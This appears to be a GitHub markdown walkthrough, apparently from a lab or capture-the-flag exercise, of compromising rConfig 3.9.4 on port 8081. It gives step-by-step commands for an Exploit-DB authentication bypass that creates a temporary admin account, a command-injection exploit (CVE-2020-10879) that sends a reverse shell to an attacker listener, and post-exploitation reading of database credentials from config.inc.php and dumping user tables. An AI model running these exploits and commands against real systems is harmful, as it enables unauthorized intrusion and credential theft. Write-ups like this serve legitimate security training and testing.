Skip to content

Latest commit

 

History

History
139 lines (99 loc) · 2.63 KB

File metadata and controls

139 lines (99 loc) · 2.63 KB

rConfig

rConfig 3.9.4 exposed over HTTPS on TCP/8081 can be chained from authentication bypass to authenticated command injection for an apache shell.

Discovery

Nmap indicators:

8081/tcp open  http  Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-title: 400 Bad Request

Plain HTTP to the port may show:

Reason: You're speaking plain HTTP to an SSL-enabled server port.

Browse with HTTPS:

https://TARGET:8081/login.php
rConfig - Configuration Management

The version is visible in the page footer:

rConfig Version 3.9.4

The authenticated settings page can leak useful environment information:

https://TARGET:8081/settings.php
PHP Version: 5.4.16
OS Version: Linux quackerjack 3.10.0-1127.10.1.el7.x86_64
Database Verson: 5.5.65-MariaDB
Database Name: rconfig
Database Connection: Localhost via UNIX socket

Auth Bypass to Temporary Admin

Exploit-DB 48878.py can create a temporary admin user. Configure the target URL with HTTPS and the trailing slash:

target="https://TARGET:8081/"

Run the PoC and choose user creation for the authentication bypass:

python3 48878.py

Successful path:

Choose method for authentication bypass:
        1) User creation
        2) User enumeration + User edit
Method>1
(+) User test created

The observed temporary credentials were:

test:Testing1@

Use the temporary admin instead of changing the real admin password.

Authenticated RCE

Use Exploit-DB 48241.py (search.crud.php command injection, CVE-2020-10879) with the temporary admin account:

searchsploit -m php/webapps/48241.py
nc -nlvp 445
python3 48241.py https://TARGET:8081/ test 'Testing1@' ATTACKER_IP 445

Successful shell:

connect to [ATTACKER_IP] from (UNKNOWN) [TARGET] PORT
bash: no job control in this shell
bash-4.2$

Confirm context:

id
# uid=48(apache) gid=48(apache) groups=48(apache)
pwd
# /home/rconfig/www/lib/crud

rConfig Database Credentials

After getting a shell, rConfig database credentials were available in the application directory:

cd /home/rconfig
cat config.inc.php

Observed values:

define('DB_PORT', '3306');
define('DB_NAME', 'rconfig');
define('DB_USER', 'rconfig_user');
define('DB_PASSWORD', 'RconfigUltraSecurePass');

Use them locally to enumerate the application database:

mysql -u rconfig_user -h 127.0.0.1 -p

Useful tables:

use rconfig;
show tables;
select * from users;
select * from active_users;

References